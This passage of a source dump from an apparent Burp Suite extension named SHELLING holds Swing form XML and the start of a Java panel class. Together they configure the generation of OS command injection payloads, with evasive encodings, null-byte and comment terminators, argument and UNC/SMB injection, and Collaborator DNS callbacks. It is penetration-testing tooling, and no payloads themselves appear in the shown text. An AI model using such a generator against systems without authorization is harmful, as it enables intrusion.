</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="jPanel6">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Terminal injection">
<Property name="tabTitle" type="java.lang.String" value="Terminal injection"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="20" max="-2" attributes="0"/>
<Component id="doTerminalInjection" min="-2" pref="1091" max="-2" attributes="0"/>
<EmptySpace pref="747" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="doTerminalInjection" min="-2" max="-2" attributes="0"/>
<EmptySpace pref="713" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JCheckBox" name="doTerminalInjection">
<Properties>
<Property name="text" type="java.lang.String" value="Test for terminal injection"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="doTerminalInjectionActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="jPanel2">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Evasive techniques">
<Property name="tabTitle" type="java.lang.String" value="Evasive techniques"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="jScrollPane1" alignment="0" min="-2" pref="679" max="-2" attributes="0"/>
<Group type="102" alignment="0" attributes="0">
<Component id="encodingsToUse" min="-2" pref="213" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="29" max="-2" attributes="0"/>
<Component id="removeEncoding" min="-2" pref="176" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="77" max="-2" attributes="0"/>
<Component id="jButton4" min="-2" pref="174" max="-2" attributes="0"/>
</Group>
<Component id="jLabel9" alignment="0" min="-2" pref="706" max="-2" attributes="0"/>
<Component id="includeLiteralWhites" alignment="0" min="-2" pref="672" max="-2" attributes="0"/>
<Component id="smart400Avoidance" alignment="0" min="-2" pref="663" max="-2" attributes="0"/>
</Group>
<EmptySpace min="-2" pref="33" max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" max="-2" attributes="0">
<Component id="useNullByte" max="32767" attributes="0"/>
<Component id="jLabel8" max="32767" attributes="0"/>
<Component id="removeTerminatorButton" alignment="0" max="32767" attributes="0"/>
<Component id="jScrollPane3" alignment="0" max="32767" attributes="0"/>
<Component id="osSpecificTerminators" alignment="0" pref="785" max="32767" attributes="0"/>
<Component id="includeThePooComboBox" alignment="0" max="32767" attributes="0"/>
<Component id="jLabel13" alignment="0" min="-2" pref="554" max="-2" attributes="0"/>
<Component id="useTerminatorsCheckBox" alignment="0" max="32767" attributes="0"/>
<Group type="102" alignment="0" attributes="0">
<Component id="addTerminatorButton" min="-2" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="addTerminatorField" min="-2" pref="505" max="-2" attributes="0"/>
</Group>
<Group type="102" alignment="0" attributes="0">
<Component id="terminatorASCIIFormat" min="-2" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="terminatorHexFormat" min="-2" max="-2" attributes="0"/>
</Group>
</Group>
<EmptySpace pref="322" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="useTerminatorsCheckBox" min="-2" pref="37" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="includeThePooComboBox" min="-2" pref="25" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="osSpecificTerminators" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="useNullByte" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="jLabel8" min="-2" pref="21" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="jScrollPane3" min="-2" pref="104" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="removeTerminatorButton" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="addTerminatorButton" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="addTerminatorField" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace max="-2" attributes="0"/>
<Component id="jLabel13" min="-2" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="terminatorASCIIFormat" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="terminatorHexFormat" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace pref="323" max="32767" attributes="0"/>
</Group>
<Group type="102" alignment="0" attributes="0">
<Component id="jLabel9" min="-2" pref="36" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="13" max="-2" attributes="0"/>
<Component id="jScrollPane1" min="-2" pref="87" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="encodingsToUse" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="removeEncoding" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="jButton4" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace min="-2" pref="26" max="-2" attributes="0"/>
<Component id="includeLiteralWhites" min="-2" pref="37" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="smart400Avoidance" min="-2" max="-2" attributes="0"/>
<EmptySpace min="0" pref="0" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="jLabel9">
<Properties>
<Property name="text" type="java.lang.String" value="Output encodings to use"/>
</Properties>
</Component>
<Container class="javax.swing.JScrollPane" name="jScrollPane1">
<AuxValues>
<AuxValue name="autoScrollPane" type="java.lang.Boolean" value="true"/>
</AuxValues>
<Layout class="org.netbeans.modules.form.compat2.layouts.support.JScrollPaneSupportLayout"/>
<SubComponents>
<Component class="javax.swing.JList" name="encodeList">
<Properties>
<Property name="model" type="javax.swing.ListModel" editor="org.netbeans.modules.form.editors2.ListModelEditor">
<StringArray count="1">
<StringItem index="0" value="URL"/>
</StringArray>
</Property>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Component class="javax.swing.JComboBox" name="encodingsToUse">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="3">
<StringItem index="0" value="URL (default)"/>
<StringItem index="1" value="None"/>
<StringItem index="2" value="Double URL"/>
</StringArray>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="encodingsToUseActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
</AuxValues>
</Component>
<Component class="javax.swing.JButton" name="removeEncoding">
<Properties>
<Property name="text" type="java.lang.String" value="Remove"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="removeEncodingActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JButton" name="jButton4">
<Properties>
<Property name="text" type="java.lang.String" value="Clear"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="jButton4ActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JCheckBox" name="useTerminatorsCheckBox">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Try to terminate strings"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="useTerminatorsCheckBoxActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="includeLiteralWhites">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Include literal space/null/newline/tab"/>
<Property name="actionCommand" type="java.lang.String" value="Include literal white chars (space, tab, newline, nullbyte)"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="includeLiteralWhitesActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="1"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="includeThePooComboBox">
<Properties>
<Property name="text" type="java.lang.String" value="Include the \ud83d\udca9 (POO) character as terminator" containsInvalidXMLChars="true"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="1"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="osSpecificTerminators">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Include OS-specific terminators (nix "#', win "::") "/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Container class="javax.swing.JScrollPane" name="jScrollPane3">
<AuxValues>
<AuxValue name="autoScrollPane" type="java.lang.Boolean" value="true"/>
</AuxValues>
<Layout class="org.netbeans.modules.form.compat2.layouts.support.JScrollPaneSupportLayout"/>
<SubComponents>
<Component class="javax.swing.JList" name="terminatorList">
<Properties>
<Property name="model" type="javax.swing.ListModel" editor="org.netbeans.modules.form.editors2.ListModelEditor">
<StringArray count="0"/>
</Property>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Component class="javax.swing.JButton" name="removeTerminatorButton">
<Properties>
<Property name="text" type="java.lang.String" value="Remove selected"/>
<Property name="enabled" type="boolean" value="false"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="removeTerminatorButtonActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JButton" name="addTerminatorButton">
<Properties>
<Property name="text" type="java.lang.String" value="Add"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="addTerminatorButtonActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JTextField" name="addTerminatorField">
</Component>
<Component class="javax.swing.JLabel" name="jLabel13">
<Properties>
<Property name="text" type="java.lang.String" value="List editor display & input format:"/>
</Properties>
</Component>
<Component class="javax.swing.JRadioButton" name="terminatorASCIIFormat">
<Properties>
<Property name="text" type="java.lang.String" value="ASCII"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="terminatorASCIIFormatActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JRadioButton" name="terminatorHexFormat">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="HEX"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="terminatorHexFormatActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JLabel" name="jLabel8">
<Properties>
<Property name="text" type="java.lang.String" value="Define custom string terminators:"/>
</Properties>
</Component>
<Component class="javax.swing.JCheckBox" name="useNullByte">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Use NULL byte"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
<Component class="javax.swing.JCheckBox" name="smart400Avoidance">
<Properties>
<Property name="selected" type="boolean" value="true"/>
<Property name="text" type="java.lang.String" value="Use smart 400 Bad request avoidance (Scanner only)"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="1"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="jPanel3">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Save the payloads">
<Property name="tabTitle" type="java.lang.String" value="Save the payloads"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="0" attributes="0">
<Component id="jLabel2" min="-2" pref="932" max="-2" attributes="0"/>
<Group type="102" attributes="0">
<Component id="saveToFileButton" min="-2" pref="213" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="31" max="-2" attributes="0"/>
<Component id="saveToClipBoardButton" min="-2" pref="213" max="-2" attributes="0"/>
</Group>
</Group>
<EmptySpace pref="914" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="21" max="-2" attributes="0"/>
<Component id="jLabel2" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Group type="103" groupAlignment="1" attributes="0">
<Component id="saveToFileButton" min="-2" pref="41" max="-2" attributes="0"/>
<Component id="saveToClipBoardButton" min="-2" pref="41" max="-2" attributes="0"/>
</Group>
<EmptySpace pref="655" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="jLabel2">
<Properties>
<Property name="text" type="java.lang.String" value="Instead of feeding the tools, save the result payload set:"/>
</Properties>
</Component>
<Component class="javax.swing.JButton" name="saveToFileButton">
<Properties>
<Property name="text" type="java.lang.String" value="To file"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="saveToFileButtonActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JButton" name="saveToClipBoardButton">
<Properties>
<Property name="text" type="java.lang.String" value="To clipboard"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="saveToClipBoardButtonActionPerformed"/>
</Events>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="advancedPanel">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Advanced">
<Property name="tabTitle" type="java.lang.String" value="Advanced"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<Group type="103" groupAlignment="1" max="-2" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="checkForInteractions" max="32767" attributes="0"/>
</Group>
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="20" max="-2" attributes="0"/>
<Component id="verboseOutputCheckBox" min="-2" pref="935" max="-2" attributes="0"/>
</Group>
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="flushTheTrackerButton" pref="1013" max="32767" attributes="0"/>
</Group>
</Group>
<EmptySpace pref="833" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace min="-2" pref="28" max="-2" attributes="0"/>
<Component id="verboseOutputCheckBox" min="-2" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="checkForInteractions" min="-2" pref="67" max="-2" attributes="0"/>
<EmptySpace type="separate" max="-2" attributes="0"/>
<Component id="flushTheTrackerButton" min="-2" pref="66" max="-2" attributes="0"/>
<EmptySpace pref="528" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JCheckBox" name="verboseOutputCheckBox">
<Properties>
<Property name="text" type="java.lang.String" value="Verbose extension output"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="verboseOutputCheckBoxActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JButton" name="checkForInteractions">
<Properties>
<Property name="text" type="java.lang.String" value="Check for new collaborator interactions now"/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="checkForInteractionsActionPerformed"/>
</Events>
</Component>
<Component class="javax.swing.JButton" name="flushTheTrackerButton">
<Properties>
<Property name="text" type="java.lang.String" value="Reset collaborator session tracker (only if you know what you are doing)"/>
<Property name="toolTipText" type="java.lang.String" value=""/>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="flushTheTrackerButtonActionPerformed"/>
</Events>
</Component>
</SubComponents>
</Container>
<Container class="javax.swing.JPanel" name="jPanel4">
<Constraints>
<Constraint layoutClass="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout" value="org.netbeans.modules.form.compat2.layouts.support.JTabbedPaneSupportLayout$JTabbedPaneConstraintsDescription">
<JTabbedPaneConstraints tabName="Byte generator">
<Property name="tabTitle" type="java.lang.String" value="Byte generator"/>
</JTabbedPaneConstraints>
</Constraint>
</Constraints>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Component id="jLabel1" min="-2" pref="209" max="-2" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
<Component id="byteGeneratorRangeCombo" min="-2" pref="751" max="-2" attributes="0"/>
<EmptySpace pref="874" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="byteGeneratorRangeCombo" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="jLabel1" alignment="3" min="-2" pref="43" max="-2" attributes="0"/>
</Group>
<EmptySpace pref="695" max="32767" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="jLabel1">
<Properties>
<Property name="text" type="java.lang.String" value="Byte range"/>
</Properties>
</Component>
<Component class="javax.swing.JComboBox" name="byteGeneratorRangeCombo">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="6">
<StringItem index="0" value="Non-numeric"/>
<StringItem index="1" value="Alphanumeric"/>
<StringItem index="2" value="Non-alphanumeric printable"/>
<StringItem index="3" value="Non-alphanumeric non-printable"/>
<StringItem index="4" value="Non-alphanumeric non-printable <128"/>
<StringItem index="5" value="All"/>
</StringArray>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="byteGeneratorRangeComboActionPerformed"/>
</Events>
<AuxValues>
<AuxValue name="JavaCodeGenerator_TypeParameters" type="java.lang.String" value="<String>"/>
<AuxValue name="JavaCodeGenerator_VariableModifier" type="java.lang.Integer" value="4"/>
</AuxValues>
</Component>
</SubComponents>
</Container>
</SubComponents>
</Container>
</SubComponents>
</Form>
================================================
FILE: Java/src/uk/co/pentest/SHELLING/ShellingPanel2.java
================================================
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package uk.co.pentest.SHELLING;
import burp.BinaryPayloadIssue;
import burp.IBurpCollaboratorClientContext;
import burp.IBurpCollaboratorInteraction;
import burp.IScanIssue;
import java.awt.Toolkit;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import javax.swing.JFileChooser;
import javax.swing.JList;
import javax.swing.JOptionPane;
import javax.swing.ListModel;
/**
*
* @author julian
*/
public class ShellingPanel2 extends javax.swing.JPanel {
protected String byteGeneratorRange;
public String mode = "auto";
public String targetOS = "all";
public String feedbackChannel = "DNS"; // "DNS" is the other option atm (also planned: response (echo) and filesystem
public boolean scannerChecks = true; // whether to automatically extend the active scanning
protected boolean verboseOutput = false;
protected IntruderPayloadGenerator curr_generator;
protected ArrayList<String> payloads;
//public IntruderPayloadGenerator lastGenerator;
// these need to be public
public static ArrayList<collabSession> collabSessions; //
public static IBurpCollaboratorClientContext collabClient; //
protected boolean warningDisplayed=false;
private static long lastCollabSessionCheck=0;
private static int collabSessionCheckThreshold=30; // what is the maximum frequency of checkCollabInteractions in seconds
protected String editorFormat="HEX";
// this thing can poll the collaborator API multiple times once many scan threads kick in
// we don't need this check intensivity for asynchronous interactions
// by the way, maybe this will help us to get rid of the DNS issues being split between sets of payloads (when multiple payloads were successful).
// We want to maintain this structure between the scans/intruder runs. The intention is as follows:
// 1. do not miss asynchronous injections, regardless to them being hit by scanner or intruder!
// 2. thus, we can generate a new collabLoc for every single attack (active scan + intruder check + export - because why not).
//
// The collabLoc will be used to match the collabSession, which in turn will contain more info about the attack (to reconstruct the valid request - we are definitely not going to store all the requests/responses in the memory for the puroose of tracking):
// it would be, by the way, cool if Collaborator provided a nice way to use subdomains through collaborator API to track payloads
// otherwise in order to identify a payload we have to assign a separate collabLoc per each one of them, which in our case might be way too many...?
// I wonder how exactly Burp Scanner does it (match the right request) when using collaborator - cause it's capable of detecting asynchronous stuff,
// reverse lookups issued after hours pop up as External DNS interactions/OS command injections ;)
// Per every single attack (Intruder attack/export/Active scan) - if auto mode is enabled - a new collabSession will be created and held until the plugin is unloaded:
// timestamp of start
// type of session (intruder/scanner/export)
// configuration (so it should be easier to make sure we know where PAYLOAD_MARK points at)?
// collabLoc - the ID generated by the Collaborator Server (the subdomain in burpcollaborator.net)
// IHttpRequestResponse req - this will either contain the baseRequest provided to doActiveScan - or IIntruderAttack.getTemplateRequest() in case of Intruder, will be null for exports
// what about including the shellings_raw payload set to it? this would make the payload matching accurate and should not be too mem-greey with reasonable configurations :D
PrintWriter stdout;
/**
* Creates new form ShellingPanel2
*/
public ShellingPanel2()
{
// activate the collaborator client
this.flushThetracker();
// set extension output
stdout = new PrintWriter(SHELLING.callbacks.getStdout(), true);
// init the UI
initComponents();
// enable "auto" mode for Intruder and export
this.enableAuto();
}
public int getDelay()
{
return Integer.parseInt(this.delayTimeSpinner.getValue().toString());
}
protected void appendListData(JList list, String[] items)
{
ArrayList tmp = new ArrayList();
for (int i=0; i < list.getModel().getSize(); i++) {
String elem = (String) list.getModel().getElementAt(i);
tmp.add(elem);
}
for(String item: items)
{
if(!tmp.contains(item)) tmp.add(item);
}
list.setListData(tmp.toArray());
}
private void removeFromListData(JList list, String item)
{
ArrayList tmp = new ArrayList();
for (int i=0; i < list.getModel().getSize(); i++) {
String elem = (String) list.getModel().getElementAt(i);
if(!elem.equals(item)) tmp.add(elem);
}
list.setListData(tmp.toArray());
}
private void initiateEncodings() // same as clear, no encoding by default
{
String empty[] = {"None"};
encodeList.setListData(empty);
}
/**
* This method is called from within the constructor to initialize the form.
* WARNING: Do NOT modify this code. The content of this method is always
* regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
private void initComponents() {
buttonGroup1 = new javax.swing.ButtonGroup();
buttonGroup2 = new javax.swing.ButtonGroup();
jCheckBox5 = new javax.swing.JCheckBox();
jTabbedPane1 = new javax.swing.JTabbedPane();
jPanel1 = new javax.swing.JPanel();
jLabel3 = new javax.swing.JLabel();
targetOSCombo = new javax.swing.JComboBox<>();
jLabel4 = new javax.swing.JLabel();
argumentField = new javax.swing.JTextField();
jLabel5 = new javax.swing.JLabel();
commandField = new javax.swing.JTextField();
payloadMarkingBox = new javax.swing.JCheckBox();
scannerChecksBox = new javax.swing.JCheckBox();
feedbackChannelCombo = new javax.swing.JComboBox<>();
jLabel7 = new javax.swing.JLabel();
delayTimeSpinner = new javax.swing.JSpinner();
jLabel10 = new javax.swing.JLabel();
manualModeCheckBox = new javax.swing.JCheckBox();
stopAllRunningScans = new javax.swing.JCheckBox();
panel1 = new java.awt.Panel();
doCommandInjection = new javax.swing.JCheckBox();
advancedPayloadLabel = new javax.swing.JLabel();
basePayloadCheckBox = new javax.swing.JCheckBox();
secondBasePayloadCheckBox = new javax.swing.JCheckBox();
thirdBasePayloadCheckBox = new javax.swing.JCheckBox();
fourthBasePayloadCheckBox = new javax.swing.JCheckBox();
fifthBasePayloadCheckBox = new javax.swing.JCheckBox();
seventhBasePayloadCheckBox = new javax.swing.JCheckBox();
sixthBasePayloadCheckBox = new javax.swing.JCheckBox();
eightBasePayloadCheckBox = new javax.swing.JCheckBox();
jPanel5 = new javax.swing.JPanel();
argInjectionCheckBox = new javax.swing.JCheckBox();
fixedArguments = new javax.swing.JCheckBox();
bruteArgInjections = new javax.swing.JCheckBox();
injectHTTPCheckBox = new javax.swing.JCheckBox();
injectFileCheckBox = new javax.swing.JCheckBox();
uncPathsCheckBox = new javax.swing.JCheckBox();
injectSmbCheckBox = new javax.swing.JCheckBox();
injectUncCheckBox = new javax.swing.JCheckBox();
jLabel6 = new javax.swing.JLabel();
injectAdditionalArguments = new javax.swing.JCheckBox();
jLabel11 = new javax.swing.JLabel();
defaultArgBruteRange = new javax.swing.JRadioButton();
customArgBruteRange = new javax.swing.JRadioButton();
customCharacterRange = new javax.swing.JTextField();
jPanel6 = new javax.swing.JPanel();
doTerminalInjection = new javax.swing.JCheckBox();
jPanel2 = new javax.swing.JPanel();
jLabel9 = new javax.swing.JLabel();
jScrollPane1 = new javax.swing.JScrollPane();
encodeList = new javax.swing.JList<>();
encodingsToUse = new javax.swing.JComboBox<>();
removeEncoding = new javax.swing.JButton();
jButton4 = new javax.swing.JButton();
useTerminatorsCheckBox = new javax.swing.JCheckBox();
includeLiteralWhites = new javax.swing.JCheckBox();
includeThePooComboBox = new javax.swing.JCheckBox();
osSpecificTerminators = new javax.swing.JCheckBox();
jScrollPane3 = new javax.swing.JScrollPane();
terminatorList = new javax.swing.JList<>();
removeTerminatorButton = new javax.swing.JButton();
addTerminatorButton = new javax.swing.JButton();
addTerminatorField = new javax.swing.JTextField();
jLabel13 = new javax.swing.JLabel();
terminatorASCIIFormat = new javax.swing.JRadioButton();
terminatorHexFormat = new javax.swing.JRadioButton();
jLabel8 = new javax.swing.JLabel();
useNullByte = new javax.swing.JCheckBox();
smart400Avoidance = new javax.swing.JCheckBox();
jPanel3 = new javax.swing.JPanel();
jLabel2 = new javax.swing.JLabel();
saveToFileButton = new javax.swing.JButton();
saveToClipBoardButton = new javax.swing.JButton();
advancedPanel = new javax.swing.JPanel();
verboseOutputCheckBox = new javax.swing.JCheckBox();
checkForInteractions = new javax.swing.JButton();
flushTheTrackerButton = new javax.swing.JButton();
jPanel4 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
